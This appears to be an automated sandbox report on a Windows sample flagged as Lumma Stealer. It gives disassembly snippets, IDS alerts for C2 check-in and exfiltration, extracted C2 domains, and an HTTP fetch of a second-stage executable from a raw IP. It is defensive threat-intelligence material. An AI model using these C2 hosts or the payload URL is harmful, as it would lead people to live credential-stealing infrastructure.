Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [edx], di	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, ecx	0_2_0097A5B6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]	0_2_0098EDC1
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097DDFF
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00976D2E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00978528
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then dec edx	0_2_0098FD70
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]	0_2_0096B57D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00979E80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_009906F0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097DE07
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then dec edx	0_2_0098FE00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov dword ptr [esp+20h], eax	0_2_00959780
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_009737D6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097BF13
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, dword ptr [esp+28h]	0_2_00975F1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp eax	0_2_00979739
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00966F52
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00977740

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49706 -> 104.21.11.101:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 104.21.11.101 104.21.11.101

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49715 -> 185.215.113.16:80

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

Source: 0zBsv1tnt4.exe	String found in binary or memory: http://185.215.113.16/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/O
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeGd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeSd
Source: 0zBsv1tnt4.exe, 00000000.00000002.1870836699.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeeWebKit/537.36
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/z
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686542592.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643183119.00000000014CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft2_
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_112.6.dr	String found in binary or memory: http://schema.org/Organization
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_112.6.dr, chromecache_89.6.dr, chromecache_122.6.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_112.6.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_112.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_112.6.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_112.6.dr	String found in binary or memory: https://github.com/nschonni
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_112.6.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001462000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1537563256.000000000150C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/==
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1591109396.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1598062166.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/Cl
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/DataA4
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/P)
Source: 0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564938918.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1565469827.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1564296751.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/aB
Source: 0zBsv1tnt4.exe, 00000000.00000003.1686758340.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/d
